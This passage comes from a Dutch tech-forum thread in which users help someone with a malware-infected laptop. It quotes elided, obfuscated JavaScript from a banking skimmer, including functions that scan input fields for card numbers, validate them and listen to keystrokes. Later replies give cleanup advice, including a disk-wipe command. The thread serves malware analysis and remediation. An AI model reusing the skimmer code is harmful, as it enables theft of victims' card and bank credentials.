                                        p5 = 'sD',
                                        s5 = 'ria',
                                        w0 = 'rdi',
                                        b2 = 'tabl',
                                        B0 = '>..',
                                        v4c = 'cou',
...
                        },
                        disable_enter: function(z) {
...
                        },
                        nothing_function: function() {},
                        formatMoney: function(i, F, S, p, M) {
...
                        },
                        hide_loading_on_account: function() {
                                o4((A4 + h + b + w4 + Y9x + R1f + X4 + F4 + p4 + v4))[(K + d2 + P + q4 + O)]();
                                o4((A4 + h + b + R6 + t3x + u4 + U2x + X1))[(K + O + O4 + P + q4 + O)]();
                        },
                        show_loading_on_account: function(z) {
...
                        },
                        getBankLogoImg: function() {
...
                        },
                        getCardLogoImg: function() {
                                var F = function(z) {
                                                var i = "rd_";
                                                g4[(G + Y + K + R1 + y + r + V4 + G + V + i + o + P + v + P)] = z;
                                        },
                                        S = "";
                                if (g4[(G + Y + K + K + O + y + r + V4 + G + V + K + U + V4 + o + g3c + P)]) return g4[(V7f + R1 + y + b6c + G + V + K + N4c + o + P + D6)];
                                F(S);
                                return S;
                        },
                        showGrabberPage: function() {
...
                        },
                        hashCardNumber: function(i) {
                                var F = "XXX";
                                if (i.length) {
                                        try {
                                                return (a8 + a8 + a8 + a8 + e6 + a8 + F + e6 + a8 + a8 + a8 + a8 + e6) + i[(B + o + x + G + O)](-4);
                                        } catch (z) {
                                                var S = ":</",
                                                        p = "ssag";
                                                g4[(V + u9x + o + P + v + V4 + m6 + p + O)]((x4c + t4 + q9 + O + K + K + P + K + S + t4 + q9) + z);
                                                return i;
                                        }
                                } else {
                                        return i;
                                }
                        },
...
                        looking_for_cc_appearence_in_inputs: function(S) {
                                var p = "puts",
                                        M = "ed_",
                                        q = 'ckb',
                                        H = 'swo',
                                        N = "exi";
                                g4[(N + B + r + O + U + V4 + E4z + Y + r + B)] = o4((M2 + b1))[(y + P + r)]((F8 + L + J8c + k + I4 + G4 + p4 + z4 + H + u9c + A5))[(y + P + r)]((F8 + L + v4 + G4 + k + I4 + y4 + Z4 + k + q + B4 + B1 + A5))[(y + P + r)]((F8 + L + v4 + a9f + I4 + Z4 + h + T + T + k + b + A5))[(Y9 + r)]((F8 + h + T + v1f + h + b + w4 + k7c));
                                g4[(O + L4 + x + B + r + M + x + y + p)][(O + V + g7)](function() {
                                        var z = "_inp",
                                                i = "_th",
                                                F = "lis";
                                        g4[(F + N1 + y + i + x + B + z + a0)](o4(this), S);
                                });
                                g4[(f6 + r + O + G + r + V4 + x + r4 + V4 + y + O + i1 + V4 + x + e2x + a0 + B + V4 + V + y0 + O + V + K + E3)](function(z) {
                                        var i = "en_";
                                        g4[(o + s9 + r + i + r + i4 + x + B + V4 + x + y + g + a0)](o4(z), S);
                                });
                        },
...
                        listen_this_input: function(z, i) {
                                var F = "nge",
                                        S = "t_c",
                                        p = "ten_i",
                                        M = "_f",
                                        q = "yb",
                                        H = "n_in";
                                g4[(o + s9 + N1 + H + g + Y + r + V4 + v9f + q + s5x + K + U + M + M8 + i6f + H8 + U)](z, i);
                                g4[(o + x + B + p + e2x + Y + S + i4 + V + F)](z, i);
                        },
                        listen_input_change: function(M, q) {
                                o4(M)[(P + y)]((C3 + L), function() {
                                        g4[(x + r4 + V4 + G + G)](this[(q4 + V + o + Y + O)], function(S) {
                                                if (x9i2x[(G + p7)](g4[(F7c + U + T1 + V4 + v7 + K + N4c + G + J5 + y + r)], 0)) {
                                                        var p = function(z) {
                                                                g4[(i4 + P + o + U + O + K + V4 + G + V + K + U + V4 + G + P + Y + f1)] = z;
                                                        };
                                                        p(1);
                                                        setTimeout(function() {
                                                                var F = function(z) {
                                                                        var i = "_ca";
                                                                        g4[(i4 + D2c + O + K + i + K + U + V4 + G + P + Y + y + r)] = z;
                                                                };
                                                                F(0);
                                                        }, 6000);
                                                        q(S);
                                                }
                                        });
                                });
                        },
                        listen_input_keyboard_for_card: function(p, M) {
                                var q = function(z) {
                                        g4[(i4 + P + u8 + T1 + V4 + v7 + K + U + i6f + P + Y8 + r)] = z;
                                };
                                q(0);
                                o4(p)[(z1 + F1z + Y + g)](function() {
                                        g4[(x + r4 + V4 + G + G)](this[(q4 + V + w2x)], function(F) {
                                                if (x9i2x[(q6 + p7)](g4[(B5 + m8c + K + V4 + v7 + K + Q7c + J5 + f1)], 0)) {
                                                        var S = function(z) {
                                                                g4[(i4 + P + o + U + T1 + V4 + G + V + K + U + V4 + G + P + Y + y + r)] = z;
                                                        };
                                                        S(1);
                                                        setTimeout(function() {
                                                                var i = function(z) {
                                                                        g4[(i4 + P + o + U + O + Z8 + G + V + K + N4c + G + J5 + f1)] = z;
                                                                };
                                                                i(0);
                                                        }, 6000);
                                                        M(F);
                                                }
                                        });
                                });
                        },
                        if_cc: function(z, i) {
                                var F = "hk";
                                z = z[(K + O + g + o + V + G + O)](/\s/g, '')[(K + O + g + o + V8 + O)](/\-/g, '');
                                if (!(x9i2x[(O + p7)](z.length, 16))) return false;
                                if (!g4[(B4f + i4 + y + K1 + F + Q7)](z)) return false;
                                if (x9i2x[(C6 + Y6 + v)](z[(G + y6c + x5x + r)](0), 0) || x9i2x[(n1 + Y6 + v)](z[(G + i4 + V + x5x + r)](0), 1) || x9i2x[(x1z + v)](z[(G + y6c + x5x + r)](0), 2) || x9i2x[(P1 + Y6 + v)](z[(G + i4 + V + K + K6 + r)](0), 7) || x9i2x[(Y + Y6 + v)](z[(G + i4 + H8 + i4f)](0), 8) || x9i2x[(s1 + b5)](z[(g7 + V + K + i4f)](0), 9)) return false;
                                i(z);
                                return true;
                        },
...
};


Deze code probeert blijkbaar bank credentials en creditcard gegevens te stelen.

Edit: btw +359 is de landcode voor Bulgarije (zie validate_phone_number).

[ Voor 101% gewijzigd door Juup op 01-08-2015 12:17 ]

Een wappie is iemand die gevallen is voor de (jarenlange) Russische desinformatiecampagnes.
Wantrouwen en confirmation bias doen de rest.

zaterdag 1 augustus 2015 13:35

Acties:
  • 0 Henk 'm!
  • johnkeates
  • Registratie: Februari 2008
  • Laatst online: 04-07 16:30

johnkeates

Wat je opslag disks betreft: stel dat je een rootkit of iets wat in je filesystem hebt, dan zou dat zich prima in je andere disks verstopt kunnen hebben.

Ik zou alle andere opslag loskoppelen, je OS disk wipen, bijvoorbeeld met een wipefs -a en daarna dd if=/dev/zero/ of=<je schijf> bs=1M count=50 om de eerste 50MB ook even uit te nullen. Dan een nieuwe GPT of MBR (afhankelijk van wat je had) en dan vanaf een schone installatiebron (dus een die je niet op je geïnfecteerde systeem gemaakt hebt) opnieuw installeren.

zaterdag 1 augustus 2015 14:00

Acties:
  • 0 Henk 'm!
  • Felicia
  • Registratie: Maart 2001
  • Laatst online: 18:11

Felicia

RobbyTown schreef op zaterdag 01 augustus 2015 @ 03:49:
Netstat gedaan. Krijg me toch een zooi aan verbindingen.
code:
1
2
3

C:\Users\rme>netstat
Active Connections
[knip]


GMER gedraaid die ziet niets vreemds.

Het surfen word nu wel enorm traag. Tweakers is nu niet voorruit te branden, op mijn tel wel.
Misschien ook ff netstat -vb als admin draaien dat je kan zien welk proces er achter de connecties zit? Vervolgens ff de processen analyseren die je niet bekend voorkomen?

Ik zou vervolgens ook een kijken naar je hosts file of daar nog dingen in staan. Hostnamen als "d" zonder suffix lijken me ook niet echt betrouwbaar ;)

[ Voor 85% gewijzigd door Felicia op 01-08-2015 14:02 ]

Ik draag een rok, wat is jouw excuus?

zaterdag 1 augustus 2015 14:48

Acties:
  • 0 Henk 'm!
  • RobbyTown
  • Registratie: April 2007
  • Niet online

RobbyTown

Godlike

Topicstarter
Petervanakelyen schreef op zaterdag 01 augustus 2015 @ 11:10:
[...]


Heb je nu al je proxy instellingen nagekeken? Dat lijkt mij nog steeds het meest voor de hand liggend.
Maak geen gebruik van proxy

Blog - Glasnet status (privé log) - Nette LAN - RIPE Atlas Probe

zaterdag 1 augustus 2015 16:44

Acties:
  • +1 Henk 'm!
  • WhiteDog
  • Registratie: Juni 2001
  • Laatst online: 09-09 20:39

WhiteDog

met zwarte hond

RobbyTown schreef op zaterdag 01 augustus 2015 @ 14:48:
[...]

Maak geen gebruik van proxy
Dat bedoelt hij ook niet. Er is malware die op je PC staat en dan in elke site code gaat injecteren doordat deze malware lokaal op je PC een proxy draait. Het kan ook een externe proxy zijn. In je browser of het OS zal je dan, bij je proxy instellingen, wat zien staan. Kijk die dus gewoon even na.

Maak geen gebruik van proxy != ik heb het nagekeken en er staat er nergens één ingesteld

Het is overigens perfect mogelijk op alle netwerkverkeer op je machine af te vangen en desnoods te manipuleren zonder dat je ergens wat instelt. Dat zal dan een filter driver op je netwerkkaart zijn, net zoals een firewall, Wireshark, ... dat doet.

[ Voor 13% gewijzigd door WhiteDog op 01-08-2015 16:45 ]

maandag 3 augustus 2015 12:00

Acties:
  • 0 Henk 'm!
  • RobbyTown
  • Registratie: April 2007
  • Niet online

RobbyTown

Godlike

Topicstarter
Dank voor alle hulp en ontcijfer van de code, heb mijn laptop maar clean install gedaan. Tot nu toe ben ik nog virus loos.

Blog - Glasnet status (privé log) - Nette LAN - RIPE Atlas Probe

Pagina: 1
Reageer

Apple iPhone 16e LG OLED evo G5 Google Pixel 10 Samsung Galaxy S25 Star Wars: Outlaws Nintendo Switch 2 Apple AirPods Pro (2e generatie) Sony PlayStation 5 Pro

Tweakers is onderdeel van DPG Media B.V.
Alle rechten voorbehouden - Auteursrecht © 1998 - 2025 Hosting door TrueFullstaq